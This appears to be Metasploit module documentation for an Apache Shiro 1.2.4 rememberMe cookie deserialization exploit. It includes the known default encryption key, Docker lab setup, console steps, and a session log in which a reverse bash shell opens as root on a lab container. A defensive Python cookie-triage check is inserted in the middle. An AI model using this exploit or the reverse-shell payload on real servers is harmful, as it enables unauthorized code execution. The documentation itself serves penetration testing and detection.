The gadget chain was previously hardcoded to CommonsCollections2. Add a JAVA_GADGET_CHAIN OptEnum so operators can select the chain that matches the target's classpath without modifying the module. Default remains CommonsCollections2 to preserve existing behaviour.
Vulnerable Application
Description
Apache Shiro v1.2.4 is affected by a Java deserialization vulnerability. An
unauthenticated user can submit a YSoSerial payload to the Apache Shiro web
server as the value of the rememberMe cookie, which results in code
execution in the context of the web server.
The YSoSerial CommonsCollections2 payload is known to work and is the
default gadget chain used by this module. The gadget chain is configurable
via the JAVA_GADGET_CHAIN option; the selected chain must be available on
the target's classpath.
Note that other versions of Apache Shiro may also be exploitable if the
encryption key used by Shiro to encrypt rememberMe cookies is known.
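As an added defensive example (not part of the module or its documentation): a Python triage check that pulls the rememberMe cookie out of constructed request log lines and flags values that cannot be Shiro's AES-CBC output (not base64, or not whole 16-byte blocks) or that are far larger than a real serialized principal. The 1024-byte threshold and the log line layout are assumptions.

```python
import base64
import binascii
import re
from typing import Iterable, Iterator, Optional, Tuple

# Shiro's rememberMe cookie is base64(IV || AES-CBC ciphertext); AES pads to 16-byte blocks.
AES_BLOCK = 16
# Assumption: a legitimate serialized PrincipalCollection is a few hundred bytes, while a
# ysoserial gadget chain such as CommonsCollections2 is several kilobytes once serialized.
MAX_LEGIT_LEN = 1024

COOKIE_RE = re.compile(r'(?:^|;\s*)rememberMe=([^;\s"]+)')


def extract_remember_me(cookie_header: str) -> Optional[str]:
    """Return the rememberMe value from a Cookie header, or None if the cookie is absent."""
    m = COOKIE_RE.search(cookie_header)
    return m.group(1) if m else None


def classify_remember_me(value: str) -> str:
    """Classify a rememberMe value: 'invalid' (cannot be Shiro output), 'suspicious'
    (structurally valid but oversized), or 'ok'."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return "invalid"
    # Need an IV block plus at least one ciphertext block, and block alignment.
    if len(raw) < 2 * AES_BLOCK or len(raw) % AES_BLOCK != 0:
        return "invalid"
    if len(raw) > MAX_LEGIT_LEN:
        return "suspicious"
    return "ok"


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (client_ip, verdict) for each log line whose Cookie header carries rememberMe.
    Assumed line layout: '<client ip> Cookie: <raw Cookie header>'."""
    for line in lines:
        ip, _, cookie_header = line.partition(" Cookie: ")
        value = extract_remember_me(cookie_header)
        if value is not None:
            yield ip, classify_remember_me(value)


# Constructed sample log lines: a plausible cookie, an oversized one, and a malformed one.
SAMPLE_LOG = [
    "10.0.0.5 Cookie: JSESSIONID=abc; rememberMe=" + base64.b64encode(b"\x00" * 256).decode(),
    "10.0.0.9 Cookie: rememberMe=" + base64.b64encode(b"\x00" * 4096).decode(),
    "10.0.0.8 Cookie: rememberMe=not%20base64!!",
]

if __name__ == "__main__":
    for ip, verdict in scan_log(SAMPLE_LOG):
        print(ip, verdict)
```

Only a decryption with the server's own key can confirm the plaintext is a gadget chain; this check is a cheap first-pass filter for picking requests worth that deeper inspection.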
Setup
You can use the Docker image from https://github.com/Medicean/VulApps/tree/master/s/shiro/1:
- Pull the docker image
docker pull medicean/vulapps:s_shiro_1
- Run the docker image, binding to port 8080
docker run --rm -p 8080:8080 medicean/vulapps:s_shiro_1
Verification Steps
use exploit/multi/http/shiro_rememberme_v124_deserialize
set rhosts <rhost>
run
Options
ENC_KEY
The encryption key the target Apache Shiro server is using to encrypt its rememberMe cookies.
JAVA_GADGET_CHAIN
The Java deserialization gadget chain to use. The chain must be available on the target's classpath.
Scenarios
Tested on GNU/Linux x86_64 using Shiro-1.2.4
msf > use exploit/multi/http/shiro_rememberme_v124_deserialize
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > show options
Module options (exploit/multi/http/shiro_rememberme_v124_deserialize):

   Name               Current Setting           Required  Description
   ----               ---------------           --------  -----------
   ENC_KEY            kPH+bIxk5D2deZiIxcaaaA==  yes       Shiro encryption key
   JAVA_GADGET_CHAIN  CommonsCollections2       yes       The Java gadget chain to use for deserialization
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              80                        yes       The target port (TCP)
   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                         yes       Base directory path
   VHOST                                        no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Unix Command payload
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set RHOSTS 172.18.0.2
RHOSTS => 172.18.0.2
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(multi/http/shiro_rememberme_v124_deserialize) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:60632) at 2020-12-21 17:09:27 -0600
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)